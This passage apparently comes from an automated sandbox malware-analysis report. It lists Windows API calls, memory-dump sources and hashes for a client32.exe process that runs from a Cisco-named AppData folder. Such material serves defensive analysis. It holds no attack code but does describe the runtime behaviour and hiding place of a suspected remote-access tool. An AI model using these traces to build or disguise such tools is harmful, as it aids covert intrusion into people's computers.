                                                                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,689B8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 689B5034
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,689B8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 689B503D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorFileLastModuleNameProc
                                                                                                                                                                                                    • String ID: GetModuleFileNameExA
                                                                                                                                                                                                    • API String ID: 4084229558-758377266
                                                                                                                                                                                                    • Opcode ID: e3081bafb541488092f6c9b05ed079fdfabceeebf5654550bfc003c4ececabb2
                                                                                                                                                                                                    • Instruction ID: c8b70748ce5321c2ce1c6e39df6f7929685fb317649ba841904a04bafeec9e4a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3081bafb541488092f6c9b05ed079fdfabceeebf5654550bfc003c4ececabb2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF058B2604218AFC724CFA4E804E9B77ACEF48B20F00491AF94AD7240C771E810CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 689B4FC4
                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,689B8E0D,00000000,?,689B8E0D,00000000,?,00000FA0,?), ref: 689B4FE4
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,689B8E0D,00000000,?,00000FA0,?), ref: 689B4FED
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                                                                                                                    • String ID: EnumProcessModules
                                                                                                                                                                                                    • API String ID: 3858832252-3735562946
                                                                                                                                                                                                    • Opcode ID: 24c9854b349f934e5f74e73343db19797e98c1b5a406fbd4cfc644e5ae3e05c4
                                                                                                                                                                                                    • Instruction ID: 5e70e1ca877daef5d77ecf7a8f8e50a29b530a89ffa19228c2f36b9179ad5cea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24c9854b349f934e5f74e73343db19797e98c1b5a406fbd4cfc644e5ae3e05c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F05872644218AFC724DFA4E844E9B77ACEF48721F00882AF95AD7240C770E810CFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00001000,Function_00134AC0,00000000,00000000,11135C92), ref: 11134CBE
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,11135C92,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134CC5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseCreateHandleThread
                                                                                                                                                                                                    • String ID: *AutoICFConfig$Client
                                                                                                                                                                                                    • API String ID: 3032276028-59951473
                                                                                                                                                                                                    • Opcode ID: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
                                                                                                                                                                                                    • Instruction ID: 999f83b1187bc70c22231b94e5d2b365f7563141598ae0e3e9d3e8eed503f9d2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8E0D8347D02087AFB119AE19C86FA9F35D9744766F500750FB21A91C4EAA06440872D
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 1106FDC7
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1106FDD4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106FEA6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                                                                                                    • String ID: Push
                                                                                                                                                                                                    • API String ID: 1566154052-4278761818
                                                                                                                                                                                                    • Opcode ID: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
                                                                                                                                                                                                    • Instruction ID: f8492b55367a0abba2df78aab96abf65533029d7cee8b1effb3e7d26cba893d6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F651DB75E00745DFE321CF64C8A4B86FBE9EF04714F4585AEE85A8B282D730B840CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 689C300D
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 689C301B
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(-000397B9), ref: 689C307F
                                                                                                                                                                                                    • SetEvent.KERNEL32(000002F8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,976034B3), ref: 689C308C
                                                                                                                                                                                                      • Part of subcall function 689C28D0: wsprintfA.USER32 ref: 689C2965
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Interlocked$CountDecrementEventExchangeTickwsprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2350468054-0
                                                                                                                                                                                                    • Opcode ID: 41934ee078fdb575cc68dbf2363f042be5fde04e23f88f59b689ae45eee9f291
                                                                                                                                                                                                    • Instruction ID: 40f8937d491205ff38c98e8ccb1ea0699612c53555d3493bac4dbe4930ab4cf8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41934ee078fdb575cc68dbf2363f042be5fde04e23f88f59b689ae45eee9f291
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 794143B6D04209AFDB04CFB9D844AEFB7BCAF58304F408519E516E7240E771D645CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,00000000,?,?,?,689BDA7F,?,00000000), ref: 689BA503
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 689BA568
                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,689BDA7F,?,00000000), ref: 689BA581
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898,00000000), ref: 689BA5B3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4212191310-0
                                                                                                                                                                                                    • Opcode ID: c33396c85e033d1041ed65e141c8eb8bdc4fe928bb09c8a18dd4e6ca7289ce4b
                                                                                                                                                                                                    • Instruction ID: 9c60600571528d4b1fb368744f781d77385e44bdb37aa7fba6267c9bf9a1840a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c33396c85e033d1041ed65e141c8eb8bdc4fe928bb09c8a18dd4e6ca7289ce4b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E2107B6909614AFDB158F18E944B9FB7FDAF82328F810426D82AA3200D3B1E940CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                    • API String ID: 2251294070-2364992241
                                                                                                                                                                                                    • Opcode ID: 25a4bea00498d77d58fd3c12edc1f3de12433bdfe34951dec407084350f47ebf
                                                                                                                                                                                                    • Instruction ID: f66355bd66e631ef02f67cdace41a374b72edc36f1231e7adb2d1e88445570b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25a4bea00498d77d58fd3c12edc1f3de12433bdfe34951dec407084350f47ebf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E011C8707052125FE706DFA6C980B6AFBE5AB84B58F20403CD919C7685DB72D841C791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,?,00000100), ref: 11087B61
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11087B78
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Unknown resource message %d, xrefs: 11087B72
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LoadStringwsprintf
                                                                                                                                                                                                    • String ID: Unknown resource message %d
                                                                                                                                                                                                    • API String ID: 104907563-2992420014
                                                                                                                                                                                                    • Opcode ID: 230266bf9d81e5302b63695d1cbe2cd380382cc3620fe64c4cd87a616e8e186b
                                                                                                                                                                                                    • Instruction ID: 1f0bb5d028b1e2f017ab8d3d7faeb30ed711f365299c9935b8e63743bfbb120c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 230266bf9d81e5302b63695d1cbe2cd380382cc3620fe64c4cd87a616e8e186b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D001C4B5A00218ABC710DF59DC81FEEF7BCEB49704F004599FA0497140DAB0AA54CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 110151C7
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110151D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                                                                                                                    • String ID: \\.\NSWFPDrv
                                                                                                                                                                                                    • API String ID: 3498533004-85019792
                                                                                                                                                                                                    • Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                                                                                                    • Instruction ID: 037b8784f9df01d9315ef50b2b73ebd220fb6a4ab94c0d71800f6b4bfbf8c5f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAD0C971A410347AE23119AAAC4CFCBBD1DDB427B6F310360BA2DE51C4C210485182F1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
